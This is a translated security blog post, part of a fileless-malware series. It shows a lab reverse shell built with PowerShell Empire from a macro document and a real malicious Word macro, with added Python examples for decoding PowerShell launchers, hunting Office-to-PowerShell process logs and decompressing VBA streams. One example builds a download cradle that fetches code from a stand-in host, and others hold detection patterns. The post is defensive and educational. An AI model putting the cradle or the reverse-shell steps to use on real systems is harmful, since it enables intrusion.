Elusive Malware Adventures Chikamu II: Akavanzika VBA Scripts

This article is part of the Fileless Malware series. Other parts of the series:

I am a fan of the Hybrid Analysis site (hereafter HA). It is a kind of malware zoo where you can safely watch wild "beasts" from a distance without getting bitten. HA runs malware in a sandboxed environment, records system calls, created files and network traffic, and hands you all of that for every sample it analyzes. So instead of spending hours untangling obfuscated code yourself, you can quickly see what the attacker was trying to do.

The HA samples that caught my eye use encoded JavaScript or Visual Basic for Applications (VBA) scripts embedded as macros in Word or Excel documents and attached to phishing emails. When opened, these macros start a PowerShell session on the victim's computer. Attackers usually hand PowerShell a Base64-encoded command stream. All of this is done to make the attack harder to spot for web filters and antivirus software that trigger on certain keywords.
Fortunately, HA decodes the Base64 on its own and immediately shows everything in readable form. In fact, you don't have to work out how these scripts operate at all, because the full command output for the running processes is visible in the corresponding HA section. See the example below:

Hybrid Analysis intercepts the Base64-encoded commands passed to PowerShell:

... and then decodes them. #magic

In the previous post, I built my own slightly obfuscated JavaScript container for launching a PowerShell session. Like a lot of PowerShell-based malware, my script then downloaded the next PowerShell script from a remote website. As an example, I downloaded a harmless PS script that just printed a message on the screen. But times change, and now I plan to make the scenario nastier.

PowerShell Empire and the Reverse Shell

One of the goals of this exercise is to show how (relatively) easy it is for an attacker to get past classic perimeter defenses and antivirus. If an IT blogger with no development skills, like me, can put together undetectable malware (fully undetectable, FUD) in a couple of evenings, imagine what a motivated young hacker can do!

And if you work in IT security but your manager doesn't grasp the possible consequences of this kind of threat, just show them this article.

Attackers dream of direct access to a victim's laptop or server. It really is that simple: all an attacker needs is to get hold of a few confidential files on the CEO's laptop.

I have already written elsewhere about the post-exploitation framework PowerShell Empire. Let's recall what it is.

It is essentially a PowerShell-based penetration testing tool that, among many other features, makes it easy to launch a reverse shell. You can study it in more detail on the PSE home site.

Let's run a small experiment. I set up an isolated malware testing environment in the Amazon Web Services cloud. You can follow my example to demonstrate a working instance of this weakness quickly and safely (and not get fired for running viruses inside the corporate perimeter).

When you start the PowerShell Empire console, you will see something like this:

First, you start a listener on your attacker machine. Enter the "listeners" command and set the IP address of your system with "set Host". Then start the listener with the "execute" command (below). From this point, your side is waiting for a network connection from the remote shell:

On the other side, you need to generate the agent code with the "launcher" command (see below). This produces the PowerShell code for the remote agent. Note that it is Base64-encoded and is the second stage of the payload. In other words, my JavaScript code will now pull down this agent and run it in PowerShell, instead of harmlessly printing characters on the screen, and the agent will connect to our remote PSE server to give us a reverse shell.
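The Base64 blob HA decodes earlier in the article and the launcher output described here have the same shape: a powershell.exe command line whose -EncodedCommand argument is the script, encoded as UTF-16LE and then Base64. The following Python is an added example, not code from the article, from Hybrid Analysis or from PowerShell Empire. It builds such a launcher line from a constructed second stage (a download cradle pointing at 203.0.113.10, an RFC 5737 documentation address) and then decodes and triages it the way the sandbox does. The indicator names, the sample script and the command-line flags are this example's own assumptions.

```python
"""Decode and triage a powershell.exe -EncodedCommand launcher line.

Added example: not code from the original article, from Hybrid Analysis or
from PowerShell Empire.  SAMPLE_CMDLINE is constructed for illustration and
203.0.113.10 is an RFC 5737 documentation address, not a real listener.
"""
import base64
import re
from typing import Optional


def _is_encoded_flag(token: str) -> bool:
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -en,
    -enc, ...) plus the documented alias -ec.  -ex*/-ep* belong to -ExecutionPolicy."""
    flag = token.lstrip("-/").lower()
    return flag == "ec" or (len(flag) >= 1 and "encodedcommand".startswith(flag))


def encode_command(script: str) -> str:
    """Build the payload the way a launcher does: UTF-16LE bytes, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if there is none.

    The payload is UTF-16LE, not ASCII: decoded as ASCII, every character is
    followed by a NUL byte, so a plain keyword grep over the raw bytes misses
    'IEX', 'DownloadString' and friends.
    """
    tokens = [t.strip("'\"") for t in cmdline.split()]
    for i, token in enumerate(tokens[:-1]):
        if _is_encoded_flag(token):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
            except ValueError:  # binascii.Error is a ValueError subclass
                return None
            return raw.decode("utf-16-le", errors="replace")
    return None


# Traits visible in the command line itself (hypothetical indicator names).
LAUNCHER_INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(rofile)?\b", re.I),
    "non_interactive": re.compile(r"-noni(nteractive)?\b", re.I),
    "policy_bypass": re.compile(r"-ex\w*\s+bypass", re.I),
}
# Traits of the decoded stage: the cradle that fetches the next stage.
SCRIPT_INDICATORS = {
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "download_cradle": re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "nested_base64": re.compile(r"FromBase64String", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def triage(cmdline: str) -> dict:
    """Decode the launcher and pull out what an analyst wants first: the
    plaintext stage, the URLs it contacts (listener / stage server) and
    the evasion traits, as a sorted list of indicator names."""
    script = decode_encoded_command(cmdline)
    found = [name for name, rx in LAUNCHER_INDICATORS.items() if rx.search(cmdline)]
    urls: list = []
    if script is not None:
        found += [name for name, rx in SCRIPT_INDICATORS.items() if rx.search(script)]
        urls = URL_RE.findall(script)
    return {"script": script, "urls": urls, "indicators": sorted(found)}


# Constructed second stage: the classic download cradle the article describes.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10:8080/index.asp')"
SAMPLE_CMDLINE = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + encode_command(STAGE2)

if __name__ == "__main__":
    for key, value in triage(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```

The UTF-16LE detail is the part worth remembering: decode the bytes as ASCII and every character comes out separated by a NUL, so keyword matching over the raw decoded bytes fails. A real launcher typically decodes to a longer stager than this constructed cradle, but the first thing to pull out of it is the same: the listener host and the path it requests.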

Reverse shell magic. This encoded PowerShell command will connect to my listener and open the remote shell.

To demonstrate the trick, I played the innocent victim and opened Evil.doc, which ran our JavaScript. Remember part one? PowerShell was configured not to show a window, so the victim notices nothing unusual. If you open Windows Task Manager, though, you will see a background PowerShell process, which still won't set off alarms for most people. It's just PowerShell, isn't it?
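The background powershell.exe the victim might notice in Task Manager is unremarkable on its own; what gives it away is its parent. The rule below is an added example, not from the article: it runs over constructed Sysmon Event ID 1 (process creation) records in JSON-lines form, the shape a log shipper such as winlogbeat forwards, and flags an Office application spawning a script host, raising the severity when the command line carries the hidden-window and encoded-command flags the text describes. Process paths, PIDs, users and the truncated -Enc blob are all made up for the example.

```python
"""Hunt process-creation logs for the lineage the text describes: an Office
application (Word opening Evil.doc) spawning a hidden PowerShell.

Added example, not from the original article.  SAMPLE_EVENTS are constructed
Sysmon Event ID 1 records in JSON-lines form; hosts, users, PIDs and the
truncated -Enc blob are invented.
"""
import json
import ntpath
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}

# Command-line traits that raise an Office->script-host hit from medium to high:
# encoded command, hidden window, no profile, non-interactive, policy bypass, cradle.
EVASION_ARGS = re.compile(
    r"-(e|ec|enc\w*)\s+[A-Za-z0-9+/=]{20,}|-w(indowstyle)?\s+hidden|-nop\b|-noni\b"
    r"|-ex\w*\s+bypass|DownloadString|\bIEX\b",
    re.I,
)

# Constructed log lines.  Event 1 is the lineage from the article; 2-5 are
# the benign neighbours a real export contains (admin shell, print helper,
# an Excel macro running cmd, and a network event that is not EventID 1).
SAMPLE_EVENTS = r"""
{"EventID": 1, "ProcessId": 4120, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "powershell.exe -NoP -NonI -W Hidden -Enc SQBFAFgAIACoAE4AZQB3AA==", "User": "CORP\\victim"}
{"EventID": 1, "ProcessId": 4188, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -NoProfile -Command Get-Service", "User": "CORP\\admin"}
{"EventID": 1, "ProcessId": 4201, "Image": "C:\\Windows\\splwow64.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "C:\\Windows\\splwow64.exe 12288", "User": "CORP\\victim"}
{"EventID": 1, "ProcessId": 4233, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "CommandLine": "cmd.exe /c whoami > C:\\Users\\Public\\w.txt", "User": "CORP\\victim"}
{"EventID": 3, "ProcessId": 4120, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "DestinationIp": "203.0.113.10", "DestinationPort": 8080}
"""


def parse_events(jsonl: str) -> list:
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def _exe(path) -> str:
    # ntpath handles Windows separators whatever OS the analysis box runs.
    return ntpath.basename(path or "").lower()


def classify(event: dict):
    """Return (severity, reason) for one process-creation event, else None."""
    if event.get("EventID") != 1:
        return None
    parent, child = _exe(event.get("ParentImage")), _exe(event.get("Image"))
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    if EVASION_ARGS.search(event.get("CommandLine", "")):
        return "high", f"{parent} spawned {child} with evasion flags"
    return "medium", f"{parent} spawned {child}"


def hunt(jsonl: str) -> list:
    """Run the rule over a log export and return alerts in log order."""
    alerts = []
    for event in parse_events(jsonl):
        verdict = classify(event)
        if verdict is not None:
            alerts.append({"severity": verdict[0], "reason": verdict[1],
                           "ProcessId": event.get("ProcessId"),
                           "CommandLine": event.get("CommandLine")})
    return alerts


if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert)
```

The parent-child pair is the durable signal: the attacker controls the command-line flags and can drop or rename them, but a document opened in Word still has to be the parent of whatever the macro launches.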

Now, once Evil.doc has run, the hidden background process connects to the server running PowerShell Empire. Putting on my white hat as a pentester, I went back to the PowerShell Empire console, and there is a message that my remote agent is active.

Then I typed the "interact" command to open a shell in PSE - and there I was! In short, I had got into the Taco server I set up some time ago.

What I have just shown does not take much effort on your part. You can do all of it comfortably over a lunch break of an hour or two and improve your information security knowledge along the way. It is also a good way to understand how attackers get past the outer perimeter defenses and sneak into your systems.

IT managers who believe they have built an impenetrable defense against any kind of intrusion will probably find it educational - provided you can persuade them to sit next to you long enough, that is.

Back to reality

As I expected, a real attack, invisible to the average user, is just a variation on what I have described. To gather material for the next part, I started looking on HA for a sample that works the same way as my contrived example. I didn't have to search for long: the site offers plenty of attacks of this type.

The malware I eventually picked on HA is a VBA script embedded in a Word document. That is, I didn't even need to fake the .doc extension: this malware really is the most ordinary-looking Microsoft Word document. If you're curious, the sample I chose is called rfq.doc.

I quickly learned that you often cannot pull the malicious VBA scripts straight out of the document. The attackers compress and hide them, and they do not show up in Word's built-in macro tools. You need a special tool to extract them. Luckily, I came across the OfficeMalScanner scanner by Frank Boldewin. Thanks, Frank.
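One reason the macro source cannot simply be copied out of the file is the storage format: in an Office binary document, each VBA module's source sits in its module stream as an MS-OVBA CompressedContainer, and OfficeMalScanner and similar tools have to inflate it before any text appears. The decompressor below is an added example, not code from OfficeMalScanner or from the article, and it runs on a container built by hand for this example rather than on data from rfq.doc. Locating the container in a real file means opening the OLE compound document and reading each module's source offset from the VBA project's `dir` stream, which is left to a proper tool.

```python
"""Decompress a VBA module source stream (MS-OVBA "CompressedContainer").

Added example, not code from the original article or from OfficeMalScanner.
SAMPLE_CONTAINER is built by hand for this example, not taken from a document.
"""
import math
import struct


def decompress_container(data: bytes) -> bytes:
    """Inflate one CompressedContainer: a 0x01 signature byte followed by chunks.

    Each chunk starts with a 2-byte little-endian header:
      bits 0-11  compressed chunk size minus 3
      bits 12-14 signature, always 0b011
      bit 15     1 = compressed, 0 = 4096 raw bytes follow
    Compressed data is a series of flag bytes, each announcing up to 8 tokens
    (bit clear = one literal byte, bit set = a 2-byte copy token pointing back
    into the bytes already produced for this chunk).
    """
    if not data or data[0] != 0x01:
        raise ValueError("not a CompressedContainer: signature byte 0x01 missing")
    out = bytearray()
    pos = 1
    while pos < len(data):
        (header,) = struct.unpack_from("<H", data, pos)
        chunk_size = (header & 0x0FFF) + 3
        if (header >> 12) & 0x7 != 0b011:
            raise ValueError(f"bad chunk signature in header 0x{header:04x}")
        compressed = header >> 15
        chunk_end = min(len(data), pos + chunk_size)
        pos += 2
        chunk_start = len(out)  # decompressed offset where this chunk begins
        if not compressed:
            out += data[pos:pos + 4096]
            pos += 4096
            continue
        while pos < chunk_end:
            flags = data[pos]
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:  # literal byte
                    out.append(data[pos])
                    pos += 1
                    continue
                (token,) = struct.unpack_from("<H", data, pos)
                pos += 2
                # The copy token's split between offset and length bits depends on
                # how much of this chunk has been produced so far: the offset field
                # widens (and the length field narrows) as the output grows.
                produced = len(out) - chunk_start
                if produced == 0:
                    raise ValueError("copy token at start of chunk")
                bit_count = max(math.ceil(math.log2(produced)), 4)
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                if offset > produced:
                    raise ValueError("copy token reaches before chunk start")
                src = len(out) - offset
                for i in range(length):  # byte-wise: source may overlap the output
                    out.append(out[src + i])
    return bytes(out)


# Hand-built container that inflates to "Sub Go()\r\nEnd Sub\r\n" (19 bytes).
SAMPLE_CONTAINER = bytes([
    0x01,                   # container signature
    0x14, 0xB0,             # header 0xB014: compressed, sig 0b011, size 0x014 + 3 = 23
    0x00, *b"Sub Go()",     # flag 0x00: eight literal bytes
    0x40, *b"\r\nEnd ",     # flag 0x40: six literals, token 6 is a copy, token 7 a literal
    0x00, 0xD0,             #   copy token 0xD000 with 14 bytes produced: offset 14, length 3 -> "Sub"
    *b"\r",
    0x00, *b"\n",           # flag 0x00: one literal, then the chunk ends
])

if __name__ == "__main__":
    print(decompress_container(SAMPLE_CONTAINER).decode("ascii"))
```

The copy-token handling is where home-grown decoders usually go wrong: the boundary between the offset and length fields moves as the chunk fills, so a token must be interpreted against the amount of output already produced, and the copy must be done byte by byte because the source window may overlap the bytes being written.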

Using this tool, I was able to extract the heavily obfuscated VBA code. It looked like this:

Obfuscation by true professionals. I was impressed!

The attackers are really good at obfuscating code, unlike my own attempts while building Evil.doc. Well, in the next part we will get out our VBA debugger, dig deeper into this code, and compare our analysis with HA's findings.

Source: www.habr.com
